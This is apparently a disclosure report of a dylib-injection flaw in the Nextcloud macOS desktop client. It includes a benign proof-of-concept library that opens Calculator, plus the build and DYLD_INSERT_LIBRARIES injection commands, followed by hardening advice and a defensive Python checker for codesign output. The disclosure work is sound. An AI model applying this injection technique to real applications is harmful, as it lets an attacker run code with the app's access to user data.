I’ve identified a code injection vulnerability in your macOS desktop client. Any malicious application running with standard user permissions is able to exploit this vulnerability and execute code in your application’s context.
In order to exploit this vulnerability, a victim has to have a malicious application installed on the device.
To show you the impact, I’ve prepared a proof of concept where a malicious application without root permissions is able to inject into the Nextcloud process and open the Calculator.
#include <Foundation/Foundation.h>

__attribute__((constructor)) static void pwn() {
    puts("\n\nHELLO FROM THE DYLIB!\n\n");
    NSTask *task = [[NSTask alloc] init];
    task.launchPath = @"/Applications/Calculator.app/Contents/MacOS/Calculator";
    [task launch];
}
gcc -dynamiclib -undefined suppress -flat_namespace malicious.m -o malicious.dylib -compatibility_version 10.10.10 -lobjc -framework Foundation
DYLD_FORCE_FLAT_NAMESPACE=1 DYLD_INSERT_LIBRARIES=./malicious.dylib /Applications/nextcloud.app/Contents/MacOS/nextcloud
Assuming that the desktop client has been compiled using Xcode, a developer needs to turn on the “Hardened Runtime” capability, making sure that the Allow DYLD Environment Variables option is turned off. Another way to disallow the DYLD environment variables is adding a _RESTRICTED segment to the application binary.
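To verify the fix from the defender’s side, the following added example (not part of the original report or the Nextcloud project) reads the output of `codesign -d -vvv` and the entitlements plist and decides whether DYLD_INSERT_LIBRARIES is still honoured. It assumes the caller has already captured both outputs on a Mac and that the entitlements are in XML plist form; the sample outputs below are constructed and the bundle identifier is a placeholder.

```python
import plistlib
import re

# Entitlement that re-enables DYLD_* variables under the Hardened Runtime.
ALLOW_DYLD_ENV = "com.apple.security.cs.allow-dyld-environment-variables"
CS_RUNTIME = 0x10000  # hardened-runtime bit in the CodeDirectory flags

def hardened_runtime_enabled(codesign_output: str) -> bool:
    """True when the `CodeDirectory ... flags=` line from `codesign -d -vvv`
    has the hardened-runtime bit set (codesign prints it as `(runtime)`)."""
    m = re.search(r"^CodeDirectory\b.*\bflags=(0x[0-9a-fA-F]+)", codesign_output, re.M)
    return bool(m) and bool(int(m.group(1), 16) & CS_RUNTIME)

def dyld_env_allowed(entitlements_xml: str) -> bool:
    """True when the entitlements plist (XML as printed by
    `codesign -d --entitlements :-`) sets allow-dyld-environment-variables."""
    if not entitlements_xml.strip():
        return False  # no entitlements at all: the variables stay blocked
    return bool(plistlib.loads(entitlements_xml.encode()).get(ALLOW_DYLD_ENV, False))

def dyld_insert_blocked(codesign_output: str, entitlements_xml: str) -> bool:
    """The state the report asks for: Hardened Runtime on, DYLD entitlement off."""
    return hardened_runtime_enabled(codesign_output) and not dyld_env_allowed(entitlements_xml)

# Constructed sample outputs; the identifier is a placeholder, not the real client's.
UNHARDENED = """Executable=/Applications/nextcloud.app/Contents/MacOS/nextcloud
Identifier=com.example.desktopclient
CodeDirectory v=20200 size=300 flags=0x0(none) hashes=3+5 location=embedded
"""
HARDENED = UNHARDENED.replace("flags=0x0(none)", "flags=0x10000(runtime)")
ENT_ALLOW_DYLD = """<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>com.apple.security.cs.allow-dyld-environment-variables</key><true/>
</dict></plist>
"""
ENT_EMPTY = ""

if __name__ == "__main__":
    for label, cs, ent in [("unhardened", UNHARDENED, ENT_EMPTY),
                           ("hardened + allow-dyld entitlement", HARDENED, ENT_ALLOW_DYLD),
                           ("hardened, no entitlement", HARDENED, ENT_EMPTY)]:
        print(f"{label}: DYLD_INSERT_LIBRARIES blocked = {dyld_insert_blocked(cs, ent)}")
```

Only the third case is a fix: Hardened Runtime alone is not enough if the allow-dyld-environment-variables entitlement is left on.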
Privilege escalation in Keybase using this technique
https://hackerone.com/reports/470003
Apple Docs - Hardened runtime entitlements
https://developer.apple.com/documentation/security/hardened_runtime_entitlements
Code execution in the application’s context. Any sensitive resource that may be accessed via the application may be stolen. The attacker is also able to perform any action that the user may perform from the app.